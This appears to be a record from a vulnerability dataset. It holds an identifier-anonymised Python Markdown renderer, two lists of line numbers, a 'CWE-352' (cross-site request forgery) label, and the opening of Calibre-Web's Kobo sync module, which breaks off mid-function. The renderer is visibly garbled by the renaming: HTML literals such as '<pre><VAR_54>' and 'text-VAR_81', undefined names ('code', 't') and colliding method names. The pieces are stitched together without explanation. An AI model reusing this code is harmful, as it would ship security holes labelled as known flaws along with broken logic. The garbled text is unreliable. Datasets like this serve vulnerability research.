return self.renderer.image(VAR_49, VAR_62, VAR_14)
self._in_link = True
VAR_14 = self.output(VAR_14)
self._in_link = False
return self.renderer.link(VAR_49, VAR_62, VAR_14)
def FUNC_36(self, VAR_44):
VAR_14 = VAR_44.group(2) or VAR_44.group(1)
VAR_14 = self.output(VAR_14)
return self.renderer.double_emphasis(VAR_14)
def FUNC_37(self, VAR_44):
VAR_14 = VAR_44.group(2) or VAR_44.group(1)
VAR_14 = self.output(VAR_14)
return self.renderer.emphasis(VAR_14)
def FUNC_38(self, VAR_44):
VAR_14 = VAR_44.group(2)
return self.renderer.codespan(VAR_14)
def FUNC_39(self, VAR_44):
return self.renderer.linebreak()
def FUNC_40(self, VAR_44):
VAR_14 = self.output(VAR_44.group(1))
return self.renderer.strikethrough(VAR_14)
def FUNC_41(self, VAR_44):
VAR_14 = VAR_44.group(0)
return self.renderer.text(VAR_14)
class CLASS_4(object):
def __init__(self, **VAR_20):
self.options = VAR_20
def FUNC_42(self):
return ''
def VAR_26(self, VAR_54, VAR_63=None):
VAR_54 = code.rstrip('\n')
if not VAR_63:
VAR_54 = VAR_19(VAR_54, VAR_16=False)
return '<pre><VAR_54>%s\n</VAR_54></pre>\n' % VAR_54
VAR_54 = VAR_19(VAR_54, VAR_15=True, VAR_16=False)
return '<pre><VAR_54 class="lang-%s">%s\n</VAR_54></pre>\n' % (VAR_63, VAR_54)
def VAR_31(self, VAR_14):
return '<blockquote>%s\n</blockquote>\n' % VAR_14.rstrip('\n')
def VAR_36(self, VAR_64):
if self.options.get('skip_style') and \
VAR_64.lower().startswith('<style'):
return ''
if self.options.get('escape'):
return VAR_19(VAR_64)
return VAR_64
def VAR_69(self, VAR_14, VAR_65, VAR_66=None):
return '<h%d>%s</h%d>\n' % (VAR_65, VAR_14, VAR_65)
def VAR_28(self):
if self.options.get('use_xhtml'):
return '<hr />\n'
return '<hr>\n'
def FUNC_48(self, VAR_67, VAR_68=True):
VAR_82 = 'ul'
if VAR_68:
VAR_82 = 'ol'
return '<%s>\n%s</%s>\n' % (VAR_82, VAR_67, VAR_82)
def VAR_33(self, VAR_14):
return '<li>%s</li>\n' % VAR_14
def VAR_35(self, VAR_14):
return '<p>%s</p>\n' % VAR_14.strip(' ')
def VAR_37(self, VAR_69, VAR_67):
return (
'<VAR_37>\n<thead>%s</thead>\n'
'<tbody>\n%s</tbody>\n</VAR_37>\n'
) % (VAR_69, VAR_67)
def FUNC_52(self, VAR_70):
return '<tr>\n%s</tr>\n' % VAR_70
def FUNC_53(self, VAR_70, **VAR_71):
if VAR_71['header']:
VAR_82 = 'th'
else:
VAR_82 = 'td'
VAR_81 = VAR_71['align']
if not VAR_81:
return '<%s>%s</%s>\n' % (VAR_82, VAR_70, VAR_82)
return '<%s style="text-VAR_81:%s">%s</%s>\n' % (
VAR_82, VAR_81, VAR_70, VAR_82
)
def VAR_52(self, VAR_14):
return '<strong>%s</strong>' % VAR_14
def VAR_53(self, VAR_14):
return '<em>%s</em>' % VAR_14
def FUNC_56(self, VAR_14):
VAR_14 = VAR_19(VAR_14.rstrip(), VAR_16=False)
return '<VAR_54>%s</VAR_54>' % VAR_14
def VAR_55(self):
if self.options.get('use_xhtml'):
return '<br />\n'
return '<br>\n'
def VAR_56(self, VAR_14):
return '<del>%s</del>' % VAR_14
def VAR_14(self, VAR_14):
if self.options.get('parse_block_html'):
return VAR_14
return VAR_19(VAR_14)
def VAR_19(self, VAR_14):
return VAR_19(VAR_14)
def VAR_48(self, VAR_49, VAR_72=False):
VAR_14 = VAR_49 = FUNC_3(VAR_49)
if VAR_72:
VAR_49 = 'mailto:%s' % VAR_49
return '<a href="%s">%s</a>' % (VAR_49, VAR_14)
def VAR_49(self, VAR_49, VAR_62, VAR_14):
VAR_49 = FUNC_3(VAR_49)
if not VAR_62:
return '<a href="%s">%s</a>' % (VAR_49, VAR_14)
VAR_62 = VAR_19(VAR_62, VAR_15=True)
return '<a href="%s" VAR_62="%s">%s</a>' % (VAR_49, VAR_62, VAR_14)
def FUNC_62(self, VAR_73, VAR_62, VAR_14):
VAR_73 = FUNC_3(VAR_73)
VAR_14 = VAR_19(VAR_14, VAR_15=True)
if VAR_62:
VAR_62 = VAR_19(VAR_62, VAR_15=True)
VAR_64 = '<img VAR_73="%s" alt="%s" VAR_62="%s"' % (VAR_73, VAR_14, VAR_62)
else:
VAR_64 = '<img VAR_73="%s" alt="%s"' % (VAR_73, VAR_14)
if self.options.get('use_xhtml'):
return '%s />' % VAR_64
return '%s>' % VAR_64
def VAR_47(self, VAR_64):
if self.options.get('escape'):
return VAR_19(VAR_64)
return VAR_64
def VAR_25(self):
return ''
def FUNC_65(self, VAR_13, VAR_74):
VAR_64 = (
'<sup class="footnote-ref" id="fnref-%s">'
'<a href="#fn-%s">%d</a></sup>'
) % (VAR_19(VAR_13), VAR_19(VAR_13), VAR_74)
return VAR_64
def FUNC_66(self, VAR_13, VAR_14):
VAR_86 = (
'<a href="#fnref-%s" class="footnote">↩</a>'
) % VAR_19(VAR_13)
VAR_14 = VAR_14.rstrip()
if VAR_14.endswith('</p>'):
VAR_14 = re.sub(r'<\/p>$', r'%s</p>' % VAR_86, VAR_14)
else:
VAR_14 = '%s<p>%s</p>' % (VAR_14, VAR_86)
VAR_64 = '<li id="fn-%s">%s</li>\n' % (VAR_19(VAR_13), VAR_14)
return VAR_64
def VAR_61(self, VAR_14):
VAR_64 = '<div class="footnotes">\n%s<ol>%s</ol>\n</div>\n'
return VAR_64 % (self.hrule(), VAR_14)
class CLASS_5(object):
def __init__(self, VAR_59=None, VAR_75=None, VAR_76=None, **VAR_20):
if not VAR_59:
VAR_59 = CLASS_4(**VAR_20)
else:
VAR_20.update(VAR_59.options)
self.renderer = VAR_59
if VAR_75 and inspect.isclass(VAR_75):
VAR_75 = VAR_75(VAR_59, **VAR_20)
if VAR_76 and inspect.isclass(VAR_76):
VAR_76 = VAR_76(**VAR_20)
if VAR_75:
self.inline = VAR_75
else:
self.inline = CLASS_3(VAR_59, **VAR_20)
self.block = VAR_76 or CLASS_1(CLASS_0())
self.footnotes = []
self.tokens = []
self._parse_block_html = VAR_20.get('parse_block_html')
def __call__(self, VAR_14):
return self.parse(VAR_14)
def FUNC_68(self, VAR_14):
return self.parse(VAR_14)
def FUNC_6(self, VAR_14):
VAR_87 = self.output(FUNC_4(VAR_14))
VAR_88 = self.block.def_footnotes
self.block.def_links = {}
self.block.def_footnotes = {}
self.inline.links = {}
self.inline.footnotes = {}
if not self.footnotes:
return VAR_87
VAR_61 = filter(lambda o: VAR_88.get(o['key']), self.footnotes)
self.footnotes = sorted(
VAR_61, VAR_13=lambda o: VAR_88.get(o['key']), reverse=True
)
VAR_67 = self.renderer.placeholder()
while self.footnotes:
VAR_103 = self.footnotes.pop()
VAR_67 += self.renderer.footnote_item(
VAR_103['key'], VAR_103['text']
)
VAR_87 += self.renderer.footnotes(VAR_67)
return VAR_87
def FUNC_69(self):
if not self.tokens:
return None
self.token = self.tokens.pop()
return self.token
def FUNC_70(self):
if self.tokens:
return self.tokens[-1]
return None # pragma: no cover
def VAR_83(self, VAR_14, VAR_43=None):
self.tokens = self.block(VAR_14, VAR_43)
self.tokens.reverse()
self.inline.setup(self.block.def_links, self.block.def_footnotes)
VAR_87 = self.renderer.placeholder()
while self.pop():
VAR_87 += self.tok()
return VAR_87
def FUNC_71(self):
VAR_89 = self.token['type']
if VAR_89.endswith('_start'):
VAR_89 = t[:-6]
return getattr(self, 'output_%s' % VAR_89)()
def FUNC_72(self):
VAR_14 = self.token['text']
while self.peek()['type'] == 'text':
VAR_14 += '\n' + self.pop()['text']
return self.inline(VAR_14)
def FUNC_73(self):
return self.renderer.newline()
def FUNC_74(self):
return self.renderer.hrule()
def FUNC_75(self):
return self.renderer.header(
self.inline(self.token['text']),
self.token['level'],
self.token['text'],
)
def FUNC_38(self):
return self.renderer.block_code(
self.token['text'], self.token['lang']
)
def FUNC_76(self):
VAR_90 = self.token['align']
VAR_91 = len(VAR_90)
VAR_92 = self.renderer.placeholder()
VAR_69 = self.renderer.placeholder()
for VAR_101, value in enumerate(self.token['header']):
VAR_81 = VAR_90[VAR_101] if VAR_101 < VAR_91 else None
VAR_71 = {'header': True, 'align': VAR_81}
VAR_92 += self.renderer.table_cell(self.inline(value), **VAR_71)
VAR_69 += self.renderer.table_row(VAR_92)
VAR_67 = self.renderer.placeholder()
for VAR_101, row in enumerate(self.token['cells']):
VAR_92 = self.renderer.placeholder()
for j, value in enumerate(row):
VAR_81 = VAR_90[j] if j < VAR_91 else None
VAR_71 = {'header': False, 'align': VAR_81}
VAR_92 += self.renderer.table_cell(self.inline(value), **VAR_71)
VAR_67 += self.renderer.table_row(VAR_92)
return self.renderer.table(VAR_69, VAR_67)
def FUNC_77(self):
VAR_67 = self.renderer.placeholder()
while self.pop()['type'] != 'block_quote_end':
VAR_67 += self.tok()
return self.renderer.block_quote(VAR_67)
def FUNC_78(self):
VAR_68 = self.token['ordered']
VAR_67 = self.renderer.placeholder()
while self.pop()['type'] != 'list_end':
VAR_67 += self.tok()
return self.renderer.list(VAR_67, VAR_68)
def FUNC_79(self):
VAR_67 = self.renderer.placeholder()
while self.pop()['type'] != 'list_item_end':
if self.token['type'] == 'text':
VAR_67 += self.tok_text()
else:
VAR_67 += self.tok()
return self.renderer.list_item(VAR_67)
def FUNC_80(self):
VAR_67 = self.renderer.placeholder()
while self.pop()['type'] != 'list_item_end':
VAR_67 += self.tok()
return self.renderer.list_item(VAR_67)
def FUNC_31(self):
self.inline._in_footnote = True
VAR_67 = self.renderer.placeholder()
VAR_13 = self.token['key']
while self.pop()['type'] != 'footnote_end':
VAR_67 += self.tok()
self.footnotes.append({'key': VAR_13, 'text': VAR_67})
self.inline._in_footnote = False
return self.renderer.placeholder()
def FUNC_81(self):
VAR_14 = self.token['text']
return self.renderer.block_html(VAR_14)
def FUNC_82(self):
VAR_14 = self.token['text']
VAR_82 = self.token['tag']
if self._parse_block_html and VAR_82 not in VAR_7:
VAR_14 = self.inline(VAR_14, VAR_43=self.inline.inline_html_rules)
VAR_93 = self.token.get('extra') or ''
VAR_64 = '<%s%s>%s</%s>' % (VAR_82, VAR_93, VAR_14, VAR_82)
return self.renderer.block_html(VAR_64)
def FUNC_83(self):
return self.renderer.paragraph(self.inline(self.token['text']))
def FUNC_41(self):
return self.renderer.paragraph(self.tok_text())
def FUNC_5(VAR_14, VAR_19=True, **VAR_20):
return CLASS_5(VAR_19=FUNC_2, **VAR_20)(VAR_14)
| [
1,
5,
7,
10,
13,
22,
23,
41,
42,
48,
49,
52,
53,
56,
59,
73,
74,
78,
83,
84,
91,
92,
95,
107,
169,
170,
174,
181,
186,
192,
197,
200,
202,
205,
208,
211,
221,
230,
235,
237,
244,
251,
258,
266,
269,
279,
282,
285,
288,
289,
292,
293,
298,
299,
303,
309,
314,
316,
319,
322,
326,
333,
337,
339,
341,
346,
348,
360,
362,
367,
370,
376,
379,
382,
387,
390,
396,
406,
413,
431,
435,
439,
440,
443,
482,
491,
492,
496,
508,
514,
517,
521,
523,
527,
530,
535,
540,
543,
545,
557,
567,
569,
573,
581,
587,
603,
613,
616,
623,
630,
636,
641,
646,
651,
655,
658,
662,
666,
667,
671,
674,
677,
681,
688,
691,
701,
704,
708,
711,
720,
723,
729,
735,
738,
746,
750,
754,
757,
765,
768,
772,
775,
790,
793,
797,
800,
804,
807,
812,
818,
821,
825,
828,
834,
837,
841,
844,
852,
855,
865,
868,
883,
886,
892,
896,
899,
908,
911,
925,
928,
933,
934,
937,
947,
949,
954,
959,
963,
964,
966,
969,
972,
976,
979,
981,
982,
985,
986,
989,
992,
997,
1004,
1007,
1013,
1018,
1022,
1024,
1029,
1032,
1033,
1036,
1038,
1044,
1047,
1050,
1057,
1062,
1067,
1068,
1074,
1076,
1077,
1086,
1088,
1094,
1101,
1109,
1111,
1117,
1127,
1131,
1140,
1143,
1146,
1147,
1150,
1159,
2,
3,
4,
5,
6,
7,
8,
9,
55,
56,
57,
58,
59,
60,
61,
62,
76,
94,
172,
442,
494,
669,
670,
936,
937,
938,
939,
940,
941,
1149,
1150,
1151,
1152,
1153,
1154,
1155,
1156,
1157,
260,
484,
485,
486,
676,
677,
678,
679,
680,
681,
682,
683,
684,
685,
686,
690,
691,
692,
693,
694,
703,
704,
705,
706,
710,
711,
712,
713,
722,
723,
724,
725,
726,
727,
731,
737,
738,
739,
740,
741,
748,
752,
756,
757,
758,
759,
760,
767,
768,
769,
770,
774,
775,
776,
777,
778,
779,
792,
793,
794,
795,
799,
800,
801,
802,
806,
807,
808,
809,
814,
820,
821,
822,
823,
827,
828,
829,
830,
836,
837,
838,
839,
843,
844,
845,
846,
847,
854,
855,
856,
857,
858,
859,
867,
868,
869,
870,
871,
872,
885,
886,
887,
888,
894,
898,
899,
900,
901,
902,
910,
911,
912,
913,
914,
927,
928,
929,
930,
971,
972,
973,
974
] | [
1,
5,
7,
10,
13,
22,
23,
41,
42,
48,
49,
53,
54,
57,
60,
74,
75,
79,
84,
85,
92,
93,
96,
108,
170,
171,
175,
182,
187,
193,
198,
201,
203,
206,
209,
212,
222,
231,
236,
238,
245,
252,
259,
267,
270,
280,
283,
286,
289,
290,
293,
294,
299,
300,
304,
310,
315,
317,
320,
323,
327,
334,
338,
340,
342,
347,
349,
361,
363,
368,
371,
377,
380,
383,
388,
391,
397,
407,
414,
432,
436,
440,
441,
444,
484,
493,
494,
498,
510,
516,
519,
523,
525,
529,
532,
537,
542,
545,
547,
559,
569,
571,
575,
583,
589,
605,
615,
618,
625,
632,
638,
643,
648,
653,
657,
660,
664,
668,
669,
673,
676,
679,
683,
690,
693,
703,
706,
710,
713,
722,
725,
731,
737,
740,
748,
752,
756,
759,
767,
770,
774,
777,
792,
795,
799,
802,
806,
809,
814,
820,
823,
827,
830,
836,
839,
843,
846,
854,
857,
867,
870,
885,
888,
894,
898,
901,
910,
913,
927,
930,
935,
936,
939,
949,
951,
956,
961,
965,
966,
968,
971,
974,
978,
981,
983,
984,
987,
988,
991,
994,
999,
1006,
1009,
1015,
1020,
1024,
1026,
1031,
1034,
1035,
1038,
1040,
1046,
1049,
1052,
1059,
1064,
1069,
1070,
1076,
1078,
1079,
1088,
1090,
1096,
1103,
1111,
1113,
1119,
1129,
1133,
1142,
1145,
1148,
1149,
1152,
1161,
2,
3,
4,
5,
6,
7,
8,
9,
56,
57,
58,
59,
60,
61,
62,
63,
77,
95,
173,
443,
496,
671,
672,
938,
939,
940,
941,
942,
943,
1151,
1152,
1153,
1154,
1155,
1156,
1157,
1158,
1159,
261,
486,
487,
488,
678,
679,
680,
681,
682,
683,
684,
685,
686,
687,
688,
692,
693,
694,
695,
696,
705,
706,
707,
708,
712,
713,
714,
715,
724,
725,
726,
727,
728,
729,
733,
739,
740,
741,
742,
743,
750,
754,
758,
759,
760,
761,
762,
769,
770,
771,
772,
776,
777,
778,
779,
780,
781,
794,
795,
796,
797,
801,
802,
803,
804,
808,
809,
810,
811,
816,
822,
823,
824,
825,
829,
830,
831,
832,
838,
839,
840,
841,
845,
846,
847,
848,
849,
856,
857,
858,
859,
860,
861,
869,
870,
871,
872,
873,
874,
887,
888,
889,
890,
896,
900,
901,
902,
903,
904,
912,
913,
914,
915,
916,
929,
930,
931,
932,
973,
974,
975,
976
] |
3CWE-352
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Calibre-Web (https://github.com/janeczku/calibre-web)
# Copyright (C) 2018-2019 shavitmichael, OzzieIsaacs
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import base64
import datetime
import sys
import os
import uuid
from time import gmtime, strftime
try:
from urllib import unquote
except ImportError:
from urllib.parse import unquote
from flask import (
Blueprint,
request,
make_response,
jsonify,
current_app,
url_for,
redirect,
abort
)
from flask_login import current_user
from werkzeug.datastructures import Headers
from sqlalchemy import func
from sqlalchemy.sql.expression import and_, or_
from sqlalchemy.exc import StatementError
from sqlalchemy.sql import select
import requests
from . import config, logger, kobo_auth, db, calibre_db, helper, shelf as shelf_lib, ub
from .constants import sqlalchemy_version2
from .helper import get_download_link
from .services import SyncToken as SyncToken
from .web import download_required
from .kobo_auth import requires_kobo_auth, get_auth_token
KOBO_FORMATS = {"KEPUB": ["KEPUB"], "EPUB": ["EPUB3", "EPUB"]}
KOBO_STOREAPI_URL = "https://storeapi.kobo.com"
KOBO_IMAGEHOST_URL = "https://kbimages1-a.akamaihd.net"
SYNC_ITEM_LIMIT = 100
kobo = Blueprint("kobo", __name__, url_prefix="/kobo/<auth_token>")
kobo_auth.disable_failed_auth_redirect_for_blueprint(kobo)
kobo_auth.register_url_value_preprocessor(kobo)
log = logger.create()
def get_store_url_for_current_request():
# Programmatically modify the current url to point to the official Kobo store
__, __, request_path_with_auth_token = request.full_path.rpartition("/kobo/")
__, __, request_path = request_path_with_auth_token.rstrip("?").partition(
"/"
)
return KOBO_STOREAPI_URL + "/" + request_path
CONNECTION_SPECIFIC_HEADERS = [
"connection",
"content-encoding",
"content-length",
"transfer-encoding",
]
def get_kobo_activated():
return config.config_kobo_sync
def make_request_to_kobo_store(sync_token=None):
outgoing_headers = Headers(request.headers)
outgoing_headers.remove("Host")
if sync_token:
sync_token.set_kobo_store_header(outgoing_headers)
store_response = requests.request(
method=request.method,
url=get_store_url_for_current_request(),
headers=outgoing_headers,
data=request.get_data(),
allow_redirects=False,
timeout=(2, 10)
)
return store_response
def redirect_or_proxy_request():
if config.config_kobo_proxy:
if request.method == "GET":
return redirect(get_store_url_for_current_request(), 307)
else:
# The Kobo device turns other request types into GET requests on redirects, so we instead proxy to the Kobo store ourselves.
store_response = make_request_to_kobo_store()
response_headers = store_response.headers
for header_key in CONNECTION_SPECIFIC_HEADERS:
response_headers.pop(header_key, default=None)
return make_response(
store_response.content, store_response.status_code, response_headers.items()
)
else:
return make_response(jsonify({}))
def convert_to_kobo_timestamp_string(timestamp):
try:
return timestamp.strftime("%Y-%m-%dT%H:%M:%SZ")
except AttributeError as exc:
log.debug("Timestamp not valid: {}".format(exc))
return datetime.datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ")
@kobo.route("/v1/library/sync")
@requires_kobo_auth
@download_required
def HandleSyncRequest():
sync_token = SyncToken.SyncToken.from_headers(request.headers)
log.info("Kobo library sync request received.")
log.debug("SyncToken: {}".format(sync_token))
if not current_app.wsgi_app.is_proxied:
log.debug('Kobo: Received unproxied request, changed request port to external server port')
# TODO: Limit the number of books return per sync call, and rely on the sync-continuatation header
# instead so that the device triggers another sync.
new_books_last_modified = sync_token.books_last_modified
new_books_last_created = sync_token.books_last_created
new_reading_state_last_modified = sync_token.reading_state_last_modified
new_archived_last_modified = datetime.datetime.min
sync_results = []
# We reload the book database so that the user get's a fresh view of the library
# in case of external changes (e.g: adding a book through Calibre).
calibre_db.reconnect_db(config, ub.app_DB_path)
only_kobo_shelves = current_user.kobo_only_shelves_sync
if only_kobo_shelves:
if sqlalchemy_version2:
changed_entries = select(db.Books,
ub.ArchivedBook.last_modified,
ub.BookShelf.date_added,
ub.ArchivedBook.is_archived)
else:
changed_entries = calibre_db.session.query(db.Books,
ub.ArchivedBook.last_modified,
ub.BookShelf.date_added,
ub.ArchivedBook.is_archived)
changed_entries = (changed_entries
.join(db.Data).outerjoin(ub.ArchivedBook, db.Books.id == ub.ArchivedBook.book_id)
.join(ub.KoboSyncedBooks, ub.KoboSyncedBooks.book_id == db.Books.id, isouter=True)
.filter(or_(ub.KoboSyncedBooks.user_id != current_user.id,
ub.KoboSyncedBooks.book_id == None))
#.filter(or_(db.Books.last_modified > sync_token.books_last_modified,
# ub.BookShelf.date_added > sync_token.books_last_modified))
.filter(ub.BookShelf.date_added > sync_token.books_last_modified) #?? or also or from above
.filter(db.Data.format.in_(KOBO_FORMATS))
.filter(calibre_db.common_filters())
.order_by(db.Books.id)
.order_by(ub.ArchivedBook.last_modified)
.join(ub.BookShelf, db.Books.id == ub.BookShelf.book_id)
.join(ub.Shelf)
.filter(ub.Shelf.user_id == current_user.id)
.filter(ub.Shelf.kobo_sync)
.distinct()
)
else:
if sqlalchemy_version2:
changed_entries = select(db.Books, ub.ArchivedBook.last_modified, ub.ArchivedBook.is_archived)
else:
changed_entries = calibre_db.session.query(db.Books,
ub.ArchivedBook.last_modified,
ub.ArchivedBook.is_archived)
changed_entries = (changed_entries
.join(db.Data).outerjoin(ub.ArchivedBook, db.Books.id == ub.ArchivedBook.book_id)
.join(ub.KoboSyncedBooks, ub.KoboSyncedBooks.book_id == db.Books.id, isouter=True)
.filter(or_(ub.KoboSyncedBooks.user_id != current_user.id,
ub.KoboSyncedBooks.book_id == None))
.filter(calibre_db.common_filters())
.filter(db.Data.format.in_(KOBO_FORMATS))
.order_by(db.Books.last_modified)
.order_by(db.Books.id)
)
#if sync_token.books_last_id > -1:
# changed_entries = changed_entries.filter(db.Books.id > sync_token.books_last_id)
reading_states_in_new_entitlements = []
if sqlalchemy_version2:
books = calibre_db.session.execute(changed_entries.limit(SYNC_ITEM_LIMIT))
else:
books = changed_entries.limit(SYNC_ITEM_LIMIT)
for book in books:
add_synced_books(book.Books.id)
formats = [data.format for data in book.Books.data]
if not 'KEPUB' in formats and config.config_kepubifypath and 'EPUB' in formats:
helper.convert_book_format(book.Books.id, config.config_calibre_dir, 'EPUB', 'KEPUB', current_user.name)
kobo_reading_state = get_or_create_reading_state(book.Books.id)
entitlement = {
"BookEntitlement": create_book_entitlement(book.Books, archived=(book.is_archived == True)),
"BookMetadata": get_metadata(book.Books),
}
if kobo_reading_state.last_modified > sync_token.reading_state_last_modified:
entitlement["ReadingState"] = get_kobo_reading_state_response(book.Books, kobo_reading_state)
new_reading_state_last_modified = max(new_reading_state_last_modified, kobo_reading_state.last_modified)
reading_states_in_new_entitlements.append(book.Books.id)
ts_created = book.Books.timestamp
try:
ts_created = max(ts_created, book.date_added)
except AttributeError:
pass
if ts_created > sync_token.books_last_created:
sync_results.append({"NewEntitlement": entitlement})
else:
sync_results.append({"ChangedEntitlement": entitlement})
new_books_last_modified = max(
book.Books.last_modified, new_books_last_modified
)
try:
new_books_last_modified = max(
new_books_last_modified, book.date_added
)
except AttributeError:
pass
new_books_last_created = max(ts_created, new_books_last_created)
if sqlalchemy_version2:
max_change = calibre_db.session.execute(changed_entries
.filter(ub.ArchivedBook.is_archived)
.order_by(func.datetime(ub.ArchivedBook.last_modified).desc()))\
.columns(db.Books).first()
else:
max_change = changed_entries.from_self().filter(ub.ArchivedBook.is_archived) \
.order_by(func.datetime(ub.ArchivedBook.last_modified).desc()).first()
max_change = max_change.last_modified if max_change else new_archived_last_modified
new_archived_last_modified = max(new_archived_last_modified, max_change)
# no. of books returned
if sqlalchemy_version2:
entries = calibre_db.session.execute(changed_entries).all()
book_count = len(entries)
else:
#entries = changed_entries.all()
book_count = changed_entries.count()
# last entry:
# sync_cont = entries[-1].Books.id or -1 if book_count else -1
log.debug("Remaining books to Sync: {}".format(book_count))
# generate reading state data
changed_reading_states = ub.session.query(ub.KoboReadingState)
if only_kobo_shelves:
changed_reading_states = changed_reading_states.join(ub.BookShelf,
ub.KoboReadingState.book_id == ub.BookShelf.book_id)\
.join(ub.Shelf)\
.filter(current_user.id == ub.Shelf.user_id)\
.filter(ub.Shelf.kobo_sync,
or_(
func.datetime(ub.KoboReadingState.last_modified) > sync_token.reading_state_last_modified,
func.datetime(ub.BookShelf.date_added) > sync_token.books_last_modified
)).distinct()
else:
changed_reading_states = changed_reading_states.filter(
func.datetime(ub.KoboReadingState.last_modified) > sync_token.reading_state_last_modified)
changed_reading_states = changed_reading_states.filter(
and_(ub.KoboReadingState.user_id == current_user.id,
ub.KoboReadingState.book_id.notin_(reading_states_in_new_entitlements)))
for kobo_reading_state in changed_reading_states.all():
book = calibre_db.session.query(db.Books).filter(db.Books.id == kobo_reading_state.book_id).one_or_none()
if book:
sync_results.append({
"ChangedReadingState": {
"ReadingState": get_kobo_reading_state_response(book, kobo_reading_state)
}
})
new_reading_state_last_modified = max(new_reading_state_last_modified, kobo_reading_state.last_modified)
sync_shelves(sync_token, sync_results, only_kobo_shelves)
sync_token.books_last_created = new_books_last_created
sync_token.books_last_modified = new_books_last_modified
sync_token.archive_last_modified = new_archived_last_modified
sync_token.reading_state_last_modified = new_reading_state_last_modified
# sync_token.books_last_id = books_last_id
return generate_sync_response(sync_token, sync_results, book_count)
def generate_sync_response(sync_token, sync_results, set_cont=False):
extra_headers = {}
if config.config_kobo_proxy:
# Merge in sync results from the official Kobo store.
try:
store_response = make_request_to_kobo_store(sync_token)
store_sync_results = store_response.json()
sync_results += store_sync_results
sync_token.merge_from_store_response(store_response)
extra_headers["x-kobo-sync"] = store_response.headers.get("x-kobo-sync")
extra_headers["x-kobo-sync-mode"] = store_response.headers.get("x-kobo-sync-mode")
extra_headers["x-kobo-recent-reads"] = store_response.headers.get("x-kobo-recent-reads")
except Exception as ex:
log.error("Failed to receive or parse response from Kobo's sync endpoint: {}".format(ex))
if set_cont:
extra_headers["x-kobo-sync"] = "continue"
sync_token.to_headers(extra_headers)
# log.debug("Kobo Sync Content: {}".format(sync_results))
response = make_response(jsonify(sync_results), extra_headers)
return response
@kobo.route("/v1/library/<book_uuid>/metadata")
@requires_kobo_auth
@download_required
def HandleMetadataRequest(book_uuid):
if not current_app.wsgi_app.is_proxied:
log.debug('Kobo: Received unproxied request, changed request port to external server port')
log.info("Kobo library metadata request received for book %s" % book_uuid)
book = calibre_db.get_book_by_uuid(book_uuid)
if not book or not book.data:
log.info(u"Book %s not found in database", book_uuid)
return redirect_or_proxy_request()
metadata = get_metadata(book)
return jsonify([metadata])
def get_download_url_for_book(book, book_format):
if not current_app.wsgi_app.is_proxied:
if ':' in request.host and not request.host.endswith(']'):
host = "".join(request.host.split(':')[:-1])
else:
host = request.host
return "{url_scheme}://{url_base}:{url_port}/kobo/{auth_token}/download/{book_id}/{book_format}".format(
url_scheme=request.scheme,
url_base=host,
url_port=config.config_external_port,
auth_token=get_auth_token(),
book_id=book.id,
book_format=book_format.lower()
)
return url_for(
"kobo.download_book",
auth_token=kobo_auth.get_auth_token(),
book_id=book.id,
book_format=book_format.lower(),
_external=True,
)
def create_book_entitlement(book, archived):
book_uuid = book.uuid
return {
"Accessibility": "Full",
"ActivePeriod": {"From": convert_to_kobo_timestamp_string(datetime.datetime.now())},
"Created": convert_to_kobo_timestamp_string(book.timestamp),
"CrossRevisionId": book_uuid,
"Id": book_uuid,
"IsRemoved": archived,
"IsHiddenFromArchive": False,
"IsLocked": False,
"LastModified": convert_to_kobo_timestamp_string(book.last_modified),
"OriginCategory": "Imported",
"RevisionId": book_uuid,
"Status": "Active",
}
def current_time():
return strftime("%Y-%m-%dT%H:%M:%SZ", gmtime())
def get_description(book):
if not book.comments:
return None
return book.comments[0].text
# TODO handle multiple authors
def get_author(book):
if not book.authors:
return {"Contributors": None}
if len(book.authors) > 1:
author_list = []
autor_roles = []
for author in book.authors:
autor_roles.append({"Name":author.name, "Role":"Author"})
author_list.append(author.name)
return {"ContributorRoles": autor_roles, "Contributors":author_list}
return {"ContributorRoles": [{"Name":book.authors[0].name, "Role":"Author"}], "Contributors": book.authors[0].name}
def get_publisher(book):
if not book.publishers:
return None
return book.publishers[0].name
def get_series(book):
if not book.series:
return None
return book.series[0].name
def get_seriesindex(book):
return book.series_index or 1
def get_metadata(book):
download_urls = []
kepub = [data for data in book.data if data.format == 'KEPUB']
for book_data in kepub if len(kepub) > 0 else book.data:
if book_data.format not in KOBO_FORMATS:
continue
for kobo_format in KOBO_FORMATS[book_data.format]:
# log.debug('Id: %s, Format: %s' % (book.id, kobo_format))
download_urls.append(
{
"Format": kobo_format,
"Size": book_data.uncompressed_size,
"Url": get_download_url_for_book(book, book_data.format),
# The Kobo forma accepts platforms: (Generic, Android)
"Platform": "Generic",
# "DrmType": "None", # Not required
}
)
book_uuid = book.uuid
metadata = {
"Categories": ["00000000-0000-0000-0000-000000000001", ],
# "Contributors": get_author(book),
"CoverImageId": book_uuid,
"CrossRevisionId": book_uuid,
"CurrentDisplayPrice": {"CurrencyCode": "USD", "TotalAmount": 0},
"CurrentLoveDisplayPrice": {"TotalAmount": 0},
"Description": get_description(book),
"DownloadUrls": download_urls,
"EntitlementId": book_uuid,
"ExternalIds": [],
"Genre": "00000000-0000-0000-0000-000000000001",
"IsEligibleForKoboLove": False,
"IsInternetArchive": False,
"IsPreOrder": False,
"IsSocialEnabled": True,
"Language": "en",
"PhoneticPronunciations": {},
# TODO: Fix book.pubdate to return a datetime object so that we can easily
# convert it to the format Kobo devices expect.
"PublicationDate": book.pubdate,
"Publisher": {"Imprint": "", "Name": get_publisher(book),},
"RevisionId": book_uuid,
"Title": book.title,
"WorkId": book_uuid,
}
metadata.update(get_author(book))
if get_series(book):
if sys.version_info < (3, 0):
name = get_series(book).encode("utf-8")
else:
name = get_series(book)
metadata["Series"] = {
"Name": get_series(book),
"Number": get_seriesindex(book), # ToDo Check int() ?
"NumberFloat": float(get_seriesindex(book)),
# Get a deterministic id based on the series name.
"Id": uuid.uuid3(uuid.NAMESPACE_DNS, name),
}
return metadata
@kobo.route("/v1/library/tags", methods=["POST", "DELETE"])
@requires_kobo_auth
# Creates a Shelf with the given items, and returns the shelf's uuid.
def HandleTagCreate():
# catch delete requests, otherwise the are handeld in the book delete handler
